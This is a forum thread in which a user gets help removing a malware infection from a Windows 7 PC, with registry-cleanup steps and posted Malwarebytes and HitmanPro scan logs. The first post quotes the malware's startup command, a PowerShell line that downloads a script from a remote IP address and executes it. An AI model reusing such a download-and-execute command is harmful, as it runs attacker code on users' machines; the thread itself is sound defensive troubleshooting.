Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

powershell.exe script running


  • Please log in to reply
5 replies to this topic

#1 hutchinson15

hutchinson15

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:18 PM

Posted 23 May 2015 - 09:26 PM

I am trying to clean an infection on a computer.  I have removed everything but this.  Every time I reboot.  I get a powershell window open with a bunch of numbers in it.

 

cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -command "$a = New-Object System.Net.WebClient; $b = $a.DownloadString('http://37.228.88.167:80/landing?action=psf&pubid=0&subid=0&systemhash=1958591137'); iex $($ B)"

 

Has anyone run across this before?  I searched the forums and came across one but the topic was closed. http://www.bleepingcomputer.com/forums/t/574756/powershellexe-script-running/

 

I have run Malwarebytes and removed malware. I have also run roguekiller to remove poweliks.

 



BC AdBot (Login to Remove)

 


m

#2 ransomwolf

ransomwolf

  • Members
  • 56 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Europe
  • Local time:05:18 PM

Posted 24 May 2015 - 04:13 AM

Hey!

 

First let's attempt to remove the registry key that causes that powershell windows to open:

 

1. Press the Windows key and the "R" key at the same time, and then type this in the window that opens: regedit

regedit-run-box.png

 

2. Windows registry editor will open. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, using the menu on the left. If you do not know how to use regedit, here's a guide. However, it's really simple and I doubt you need a guide :)

 

3. When you're there, on the right side of the screen, find the item which "data" begins with cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe, and right click and delete it!

If it's not there, please check if it's in  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, and delete it.

Warning: only remove that item I mentioned! Don't delete anything that isn't in those two locations, and which data doesn't start with cmd.exe /c start C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe

 

Now the powershell shouldn't start when you boot the PC. However, your PC may still be infected.

You know how to run Malwarebytes, so please do a scan and remove the malware it finds. If it asks you to restart the PC, say "yes". Then, open Malwarebytes, select the "History" tab on the top, click the most recent "scan log", and on the window that opens, on the bottom, click "export --> copy to clipboard" and paste it here.

64W9vTD.png

 

-------------------

Then, I want you to run a scan with HitmanPro. Here are the instructions:

 

1. Download Hitman Pro 32 bits if your OS is 32 bits or Hitman Pro 64 bits if your OS is 64 bits.

2. Run it. You should see this screen. Press next:

l0a2dmL.png

 

3. Select "no, I want to perform a one time scan to check this computer" and press "next":

4xy072A.png

 

4. After the scan completes (could take a while, since some suspicious files in your PC can get uploaded to the cloud for scanning), DON'T REMOVE ANYTHING YET! In the bottom left of the screen, click "Save log":

OZbZSZn.png

 

5. Close HitmanPro and please copy the log and post it here.


Edited by ransomwolf, 24 May 2015 - 08:16 AM.


#3 hutchinson15

hutchinson15
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:18 PM

Posted 24 May 2015 - 05:02 PM

Here is the malwarebytes log after I deleted the regedit file powershell.exe....

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/24/2015
Scan Time: 4:03:14 PM
Logfile:
Administrator: Yes

Version: 2.01.6.1022
Malware Database: v2015.05.24.03
Rootkit Database: v2015.05.16.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Duane

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 341752
Time Elapsed: 44 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 1
Trojan.FakeVer.NSI, C:\Users\Duane\AppData\Roaming\3YDXZT8sF5RMnO9-j5yFh0P2lCARetV-E1aP6fcqFDXtuMk-y6KeTS83ZPbvrQh.exe, Quarantined, [b2c1534497f3af878399154b58aafe02],

Physical Sectors: 0
(No malicious items detected)

(end)

 

FYI this is the scan log from yesterday when I realized I had a huge problem. The poweliks malware was removed using roguekiller.

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/22/2015
Scan Time: 11:10:52 AM
Logfile:
Administrator: Yes

Version: 2.01.6.1022
Malware Database: v2015.05.22.03
Rootkit Database: v2015.05.16.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User:

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 348494
Time Elapsed: 29 min, 6 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 1
Trojan.Bunitu, C:\Users\Duane\AppData\Local\ntgislq.dll, Delete-on-Reboot, [67447521e1a9fc3a03ca0d0c976f9e62],

Registry Keys: 2
Trojan.Vawtrak, HKLM\SOFTWARE\CLASSES\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}, Quarantined, [2982672f4743bc7ab7ad05130105857b],
Trojan.Vawtrak, HKU\S-1-5-21-3780351661-4284392372-2404105391-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}, Quarantined, [2982672f4743bc7ab7ad05130105857b],

Registry Values: 1
Trojan.Bunitu, HKU\S-1-5-21-3780351661-4284392372-2404105391-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|ntgislq, rundll32 "C:\Users\Duane\AppData\Local\ntgislq.dll",ntgislq, Quarantined, [67447521e1a9fc3a03ca0d0c976f9e62]

Registry Data: 0
(No malicious items detected)

Folders: 1
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}, Delete-on-Reboot, [0d9e0a8cb0da73c3f377656bed16f60a],

Files: 21
Trojan.Bunitu, C:\Users\Duane\AppData\Local\ntgislq.dll, Delete-on-Reboot, [67447521e1a9fc3a03ca0d0c976f9e62],
Trojan.Vawtrak, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\acledit.dll, Delete-on-Reboot, [2982672f4743bc7ab7ad05130105857b],
Trojan.JobLaunch.ODB, C:\Users\Duane\AppData\Roaming\yfuygt.dll, Quarantined, [208be5b16d1dda5c73c6a6549071ea16],
Trojan.Agent.ED, C:\Users\Duane\AppData\Roaming\Mozilla\svchoste.exe, Quarantined, [fbb02e6891f93402752cfe5f946e9e62],
Trojan.Chrome.INJ, C:\Users\Duane\AppData\Local\Temp\uuruvat.dll, Quarantined, [ddce96004e3c1125570268a432d0bd43],
Trojan.CryptoLocker, C:\Users\Duane\AppData\Local\Temp\F16B.tmp, Quarantined, [0d9e6c2a6b1fc373f11dd9839a687789],
Trojan.Agent.PWN, C:\Users\Duane\AppData\Local\Temp\BDD0.tmp, Quarantined, [8328abebf991ef4773c8f140fe04718f],
Trojan.FakeVER.ED, C:\Users\Duane\AppData\Local\Temp\7FCB.tmp, Quarantined, [f0bb6333246687af89013f163ec4bb45],
Trojan.Agent.ED, C:\Users\Duane\AppData\Local\Temp\AD3B.tmp, Quarantined, [0f9c0492ee9cf0462d009485d82e2bd5],
Trojan.Agent.DED, C:\Users\Duane\AppData\Local\Temp\AC2A.tmp, Quarantined, [72390d896f1b6fc73e54708d09f8857b],
Trojan.Agent.ED, C:\Users\Duane\AppData\Local\Temp\F90C.tmp, Quarantined, [bcef0096e8a290a699087de0ba481ae6],
Trojan.Agent.ED, C:\Users\Duane\AppData\Local\Temp\CCF0.tmp, Quarantined, [bdee4a4c206ae650237eadb0c63c827e],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\8afc49b02429a, Delete-on-Reboot, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\acs.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\kakuog.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\kemgskmiq.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\oiosoauyg.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\oqm.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\qqkeaoigmm.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\qwsqqiwok.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],
Trojan.Clicker.FMS, C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\yeisi.tmp, Quarantined, [0d9e0a8cb0da73c3f377656bed16f60a],

Physical Sectors: 0
(No malicious items detected)

(end)


Edited by hutchinson15, 24 May 2015 - 05:03 PM.


#4 hutchinson15

hutchinson15
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:18 PM

Posted 24 May 2015 - 05:13 PM

Here is the log from Hitman

 

 Scan date . . . . . . : 2015-05-24 16:54:54
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 16m 40s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No

   Threats . . . . . . . : 2
   Traces  . . . . . . . : 87

   Objects scanned . . . : 1,882,137
   Files scanned . . . . : 54,940
   Remnants scanned  . . : 630,606 files / 1,196,591 keys

Malware _____________________________________________________________________

   C:\Users\Duane\AppData\Local\Apps\2.0\E0LQT5V5.C4P\JZ4H7D3O.CN3\dell..tect_0f612f649c4a10af_0005.0007_none_78524b06fd68d189\DellSystemDetect.exe
      Size . . . . . . . : 254,976 bytes
      Age  . . . . . . . : 365.9 days (2014-05-23 20:09:53)
      Entropy  . . . . . : 6.7
      SHA-256  . . . . . : FA80EDD1B1C44E323D600F96F8893D6139373C57464905551D2900AE7FC39732
      Product  . . . . . : Dell System Detect
      Publisher  . . . . : Dell
      Description  . . . : Dell System Detect
      Version  . . . . . : 5.7.0.6
      LanguageID . . . . : 0
    > HitmanPro  . . . . : DellSystemDetectVuln
      Fuzzy  . . . . . . : 100.0

   C:\Users\Duane\AppData\Local\Apps\2.0\E0LQT5V5.C4P\JZ4H7D3O.CN3\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe
      Size . . . . . . . : 254,976 bytes
      Age  . . . . . . . : 365.9 days (2014-05-23 20:09:53)
      Entropy  . . . . . : 6.7
      SHA-256  . . . . . : FA80EDD1B1C44E323D600F96F8893D6139373C57464905551D2900AE7FC39732
      Product  . . . . . : Dell System Detect
      Publisher  . . . . : Dell
      Description  . . . : Dell System Detect
      Version  . . . . . : 5.7.0.6
      LanguageID . . . . : 0
    > HitmanPro  . . . . : DellSystemDetectVuln
      Fuzzy  . . . . . . : 100.0

Suspicious files ____________________________________________________________

   C:\Users\Duane\Desktop\FRST64.exe
      Size . . . . . . . : 2,108,416 bytes
      Age  . . . . . . . : 0.8 days (2015-05-23 20:43:03)
      Entropy  . . . . . : 7.5
      SHA-256  . . . . . : 18368D360E550098044037EBEC4BA93B8D98725B8EA03C89E9B0F3EADC5FC180
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.

Potential Unwanted Programs _________________________________________________

   ask.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Web Data

Cookies _____________________________________________________________________

   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:2o7.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ad.360yield.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ad.mlnadvertising.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.avocet.io
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.creative-serving.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.mediade.sk
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.p161.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.pointroll.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.pubmatic.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.stickyadstv.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.undertone.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ads.yahoo.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:adtech.de
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:adtechus.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:advertising.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:at.atwola.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:atdmt.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:atwola.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:bs.serving-sys.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:burstnet.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:casalemedia.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:collective-media.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:dmtracker.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:doubleclick.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:emjcd.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:epilot.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:fastclick.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:googleads.g.doubleclick.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:interclick.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:media6degrees.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:mediaplex.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:microsoftwlsearchcrm.112.2o7.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:msnbc.112.2o7.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:pointroll.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:questionmarket.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:realmedia.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:revsci.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:ru4.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:serving-sys.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:smartadserver.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:specificclick.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:statcounter.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:statse.webtrendslive.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:tacoda.at.atwola.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:testdata.coremetrics.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:track.adform.net
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:tribalfusion.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:www.googleadservices.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:xiti.com
   C:\Users\Duane\AppData\Local\Google\Chrome\User Data\Default\Cookies:zedo.com
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\0GID7JIM.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\4VXZ9BJU.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\6EWCDS0G.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\6FYU7OQN.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\6KYLUHG2.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\7D11IMOJ.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\7SYRUNGR.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\8UWBW1YY.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\93BEY1RH.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\9EO72IZL.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\BO2TYVX0.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\C49VJ141.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\CYJ3CJ9R.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\DPGTU5CU.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\ET4ZHZYG.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\FYH6CDE5.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\GGSZYNOM.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\H096XBG4.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\IEIO3MO5.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\IQ3Y3SQM.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\K4RXTPAQ.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\KNXOGKO6.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\LB9PKNO4.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\LNKYLUG4.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\N0EC556G.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\QR84LLNZ.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\T3E30EO1.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\TDXWSPOB.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\TS12FY74.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\U08HQLH6.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\WENPIV4V.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\WURX3D2N.txt
   C:\Users\Duane\AppData\Roaming\Microsoft\Windows\Cookies\ZSCKCBRU.txt

[/code]



#5 ransomwolf

ransomwolf

  • Members
  • 56 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Europe
  • Local time:05:18 PM

Posted 25 May 2015 - 07:56 AM

Hey,

 

Type "folder options" in the start menu, then go to "view", and untick "Hide extensions for known file types", and select " Show hidden files, folders and drives":

 

l3klcEv.gif
apps-1.jpg

 

Then, please check if there any .dll or .exe files in the root of these directories (not the subfolders!):

C:\Users\Duane\AppData\Roaming
C:\Users\Duane\AppData\Local
C:\Users\Duane\AppData\Roaming\Mozilla\

Note: You can press the "Windows" key and the "R" key, and then enter those directories, rather than to go to them manually.

 

If you find any .dll or .exe files, delete them. Let me know if you find anything and/or have trouble deleting.

 

After that, download and run Temp File Cleaner by OldTimer. You just need to open it, and click the "start" button. If it asks you to reboot the PC, say "yes".


Edited by ransomwolf, 25 May 2015 - 08:16 AM.


#6 hutchinson15

hutchinson15
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:12:18 PM

Posted 29 May 2015 - 02:38 PM

Thanks for your help. The computer seemed to be running okay the last I checked. It was my father's and I am no longer in the same town to do these last steps. When I am back that way I will try out these last steps and post something then if able. It will be a 6 weeks from now though.

 

Thanks for your help so far!






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users